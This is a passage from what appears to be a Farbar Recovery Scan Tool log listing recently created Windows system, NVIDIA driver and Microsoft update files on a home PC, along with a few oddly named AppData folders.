C:\Users\****\Desktop\mbar-1.09.3.1001.exe 2017-08-01 03:41 - 2017-08-01 04:04 - 000000000 ____D C:\ProgramData\TEMP 2017-08-01 02:24 - 2017-08-01 02:24 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job 2017-08-01 02:17 - 2017-08-01 02:17 - 002381312 _____ (Farbar) C:\Users\****\Desktop\FRST64.exe 2017-08-01 02:04 - 2017-08-01 03:19 - 000000000 ____D C:\Users\****\AppData\LocalLow\Mozilla 2017-08-01 02:04 - 2017-08-01 03:14 - 000000000 ____D C:\Users\****\AppData\Local\Mozilla 2017-08-01 01:54 - 2017-08-01 01:54 - 000003628 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA 2017-08-01 01:54 - 2017-08-01 01:54 - 000003504 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore 2017-08-01 01:54 - 2017-08-01 01:54 - 000002302 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2017-08-01 01:54 - 2017-08-01 01:54 - 000002290 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2017-07-31 20:21 - 2017-07-31 20:21 - 000000000 ____D C:\Users\****\AppData\Local\PDF24 2017-07-28 19:41 - 2017-07-19 00:38 - 000135800 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe 2017-07-28 19:41 - 2017-03-10 23:17 - 000536864 _____ C:\WINDOWS\system32\vulkan-1.dll 2017-07-28 19:41 - 2017-03-10 23:17 - 000525600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll 2017-07-28 19:41 - 2017-03-10 23:17 - 000254240 _____ C:\WINDOWS\system32\vulkaninfo.exe 2017-07-28 19:41 - 2017-03-10 23:17 - 000233760 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe 2017-07-28 19:39 - 2017-07-19 02:40 - 040239736 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcompiler.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 035844728 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 035314296 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcompiler.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 028960376 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 013655672 _____ (NVIDIA 
Corporation) C:\WINDOWS\system32\nvcuda.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 012451424 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 012133112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvptxJitCompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 011591576 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 010487760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 009982968 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvptxJitCompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 004210032 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 004163520 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 003711328 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 003595896 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001988216 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6438494.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001598072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6438494.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001278528 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFTH264.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001276992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFThevc.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001068152 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001004992 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000996760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFTH264.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000995408 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFThevc.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000972920 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000924280 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000781544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000725112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvDecMFTMjpeg.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000689992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvfatbinaryLoader.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000618744 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmcumd.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000617416 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000609912 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000584312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvDecMFTMjpeg.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000578056 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvfatbinaryLoader.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000499136 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000057792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvhci.sys
2017-07-28 19:39 - 2017-07-19 02:40 - 000046463 _____ C:\WINDOWS\system32\nvinfo.pb
2017-07-28 19:39 - 2017-07-19 02:40 - 000000669 _____ C:\WINDOWS\SysWOW64\nv-vk32.json
2017-07-28 19:39 - 2017-07-19 02:40 - 000000669 _____ C:\WINDOWS\system32\nv-vk64.json
2017-07-28 18:14 - 2017-07-28 18:14 - 000004308 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:14 - 2017-07-28 18:14 - 000004000 _____ C:\WINDOWS\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:14 - 2017-07-28 18:14 - 000003994 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:14 - 2017-07-26 19:09 - 001922496 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2017-07-28 18:14 - 2017-07-26 19:09 - 001505728 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2017-07-28 18:13 - 2017-07-28 18:13 - 000003894 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003866 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003858 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003696 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003654 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-26 19:09 - 000048064 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys
2017-07-26 21:16 - 2017-08-01 04:05 - 000000000 ____D C:\Users\****\AppData\Local\Usidikujp
2017-07-26 21:16 - 2017-08-01 04:05 - 000000000 ____D C:\Users\****\AppData\Local\Rvurcez
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Yhwopc
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Wqy He
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Bizpiwcinu
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Bgew
2017-07-24 19:44 - 2017-07-26 19:09 - 000179136 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2017-07-24 19:44 - 2017-07-26 19:09 - 000146368 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2017-07-16 11:47 - 2017-07-16 11:47 - 001804696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WdfCoInstaller01011.dll
2017-07-16 11:47 - 2017-07-16 11:47 - 000032840 _____ (ELAN Microelectronic Corp.) C:\WINDOWS\system32\Drivers\ETDSMBus.sys
2017-07-15 22:59 - 2017-07-15 22:59 - 000000000 ____D C:\Users\****\AppData\LocalLow\Thunder Lotus Games
2017-07-15 22:51 - 2017-07-15 22:51 - 000001418 _____ C:\Users\Public\Desktop\Darkest Dungeon.lnk
2017-07-12 19:41 - 2017-06-30 16:47 - 000835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-07-12 19:41 - 2017-06-30 16:47 - 000177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-07-11 20:54 - 2017-07-07 16:00 - 000947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\HoloSI.PCShell.dll
2017-07-11 20:54 - 2017-07-07 09:24 - 000117664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2017-07-11 20:54 - 2017-07-07 09:23 - 002399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-07-11 20:54 - 2017-07-07 09:21 - 032688336 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsRaw.dll
2017-07-11 20:54 - 2017-07-07 09:20 - 002021680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll
2017-07-11 20:54 - 2017-07-07 09:20 - 000519584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
2017-07-11 20:54 - 2017-07-07 09:13 - 000554392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2017-07-11 20:54 - 2017-07-07 09:13 - 000336320 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2017-07-11 20:54 - 2017-07-07 09:11 - 000094624 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2017-07-11 20:54 - 2017-07-07 09:10 - 001670496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2017-07-11 20:54 - 2017-07-07 09:10 - 001325968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-07-11 20:54 - 2017-07-07 09:10 - 000254168 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2017-07-11 20:54 - 2017-07-07 09:07 - 001106848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2017-07-11 20:54 - 2017-07-07 09:07 - 000058488 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
2017-07-11 20:54 - 2017-07-07 08:57 - 000626528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-07-11 20:54 - 2017-07-07 08:57 - 000125344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmapi.dll
2017-07-11 20:54 - 2017-07-07 08:40 - 023677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-07-11 20:54 - 2017-07-07 08:39 - 001839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-07-11 20:54 - 2017-07-07 08:39 - 000096128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmcmnutils.dll
2017-07-11 20:54 - 2017-07-07 08:37 - 031652264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsRaw.dll
2017-07-11 20:54 - 2017-07-07 08:37 - 002259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-07-11 20:54 - 2017-07-07 08:37 - 001339352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpmde.dll
2017-07-11 20:54 - 2017-07-07 08:31 - 005820984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-07-11 20:54 - 2017-07-07 08:31 - 001518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-07-11 20:54 - 2017-07-07 08:31 - 000129184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2017-07-11 20:54 - 2017-07-07 08:30 - 002165752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-07-11 20:54 - 2017-07-07 08:30 - 000949920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dcomp.dll
2017-07-11 20:54 - 2017-07-07 08:30 - 000750496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2017-07-11 20:54 - 2017-07-07 08:29 - 000349600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2017-07-11 20:54 - 2017-07-07 08:29 - 000123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Clipc.dll
2017-07-11 20:54 - 2017-07-07 08:27 - 006759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-07-11 20:54 - 2017-07-07 08:27 - 000557568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 020373408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 001529384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 001195240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioEng.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 000988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-07-11 20:54 - 2017-07-07 08:25 - 000035232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininitext.dll
2017-07-11 20:54 - 2017-07-07 08:23 - 000583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-07-11 20:54 - 2017-07-07 08:23 - 000110592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2017-07-11 20:54 - 2017-07-07 08:23 - 000095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2017-07-11 20:54 - 2017-07-07 08:20 - 023681536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-07-11 20:54 - 2017-07-07 08:20 - 008331264 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2017-07-11 20:54 - 2017-07-07 08:20 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\prntvpt.dll
2017-07-11 20:54 - 2017-07-07 08:19 - 007149056 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2017-07-11 20:54 - 2017-07-07 08:19 - 000165888 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2017-07-11 20:54 - 2017-07-07 08:18 - 000548864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll
2017-07-11 20:54 - 2017-07-07 08:17 - 000692736 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2017-07-11 20:54 - 2017-07-07 08:17 - 000588800 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-07-11 20:54 - 2017-07-07 08:17 - 000422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-07-11 20:54 - 2017-07-07 08:16 - 012786176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-07-11 20:54 - 2017-07-07 08:16 - 000545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-07-11 20:54 - 2017-07-07 08:15 - 008238080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 008211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 003784704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 002956800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-07-11 20:54 - 2017-07-07 08:14 - 001448960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 000790016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 000570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2017-07-11 20:54 - 2017-07-07 08:13 - 013839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 004730880 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 001142272 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 000706560 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-07-11 20:54 - 2017-07-07 08:11 - 001812480 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2017-07-11 20:54 - 2017-07-07 08:10 - 000079872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2017-07-11 20:54 - 2017-07-07 08:10 - 000025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapprovp.dll
2017-07-11 20:54 - 2017-07-07 08:09 - 020504576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-07-11 20:54 - 2017-07-07 08:09 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-07-11 20:54 - 2017-07-07 08:08 - 000285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2017-07-11 20:54 - 2017-07-07 08:07 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll
2017-07-11 20:54 - 2017-07-07 08:07 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\raschap.dll
2017-07-11 20:54 - 2017-07-07 08:06 - 000412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2017-07-11 20:54 - 2017-07-07 08:06 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsExt.dll
2017-07-11 20:54 - 2017-07-07 08:06 - 000205824 _____ (Microsoft Corporation) C:\WINDOWS\system32\sensrsvc.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 019335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 011870720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 006728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 005719040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 000502784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DevicePairing.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Wldap32.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 005961216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 001248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 000754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 000506368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 000394240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2017-07-11 20:54 - 2017-07-07 08:03 - 006123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2017-07-11 20:54 - 2017-07-07 08:03 - 000636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-07-11 20:54 - 2017-07-07 08:03 - 000446464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll
2017-07-11 20:54 - 2017-07-07 08:02 - 000952832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2017-07-11 20:54 - 2017-07-07 08:02 - 000508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2017-07-11 20:54 - 2017-07-07 08:01 - 006287360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-07-11 20:54 - 2017-07-07 08:01 - 002859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 007596544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 005225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 002588160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 001626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 001565184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 001019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 004417024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 003656704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 001494016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 001355264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpcServices.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 000787456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 004559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 002782720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 002298368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 001237504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll
2017-07-11 20:54 - 2017-07-07 07:55 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPhoto.dll
2017-07-11 20:54 - 2017-07-07 07:55 - 000329216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsApi.dll
2017-07-11 20:54 - 2017-07-07 07:53 - 001301504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdc.dll
2017-07-11 20:54 - 2017-07-07 07:53 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msinfo32.exe
2017-07-11 20:54 - 2017-06-20 08:11 - 000411992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll
2017-07-11 20:54 - 2017-06-20 08:08 - 001242528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2017-07-11 20:54 - 2017-06-20 08:06 - 000279968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys
2017-07-11 20:54 - 2017-06-20 08:03 - 000820128 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-07-11 20:54 - 2017-06-20 08:02 - 001055648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-07-11 20:54 - 2017-06-20 07:59 - 006554928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-07-11 20:54 - 2017-06-20 07:59 - 001220072 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2017-07-11 20:54 - 2017-06-20 07:59 - 000467504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2017-07-11 20:54 - 2017-06-20 07:57 - 002681760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-07-11 20:54 - 2017-06-20 07:34 - 000192416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2017-07-11 20:54 - 2017-06-20 07:15 - 000455104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAudDecMFT.dll
2017-07-11 20:54 - 2017-06-20 07:13 - 000787712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2017-07-11 20:54 - 2017-06-20 07:13 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModelOOBE.exe
2017-07-11 20:54 - 2017-06-20 07:12 - 000293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-07-11 20:54 - 2017-06-20 07:12 - 000115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2017-07-11 20:54 - 2017-06-20 07:12 - 000086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hdaudbus.sys
2017-07-11 20:54 - 2017-06-20 07:11 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-07-11 20:54 - 2017-06-20 07:10 - 000722432 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2017-07-11 20:54 - 2017-06-20 07:10 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-07-11 20:54 - 2017-06-20 07:09 - 000551424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Payments.dll
2017-07-11 20:54 - 2017-06-20 07:09 - 000406032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2017-07-11 20:54 - 2017-06-20 07:09 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Narrator.exe
2017-07-11 20:54 - 2017-06-20 07:09 - 000140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 004469840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-07-11 20:54 - 2017-06-20 07:08 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000328704 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
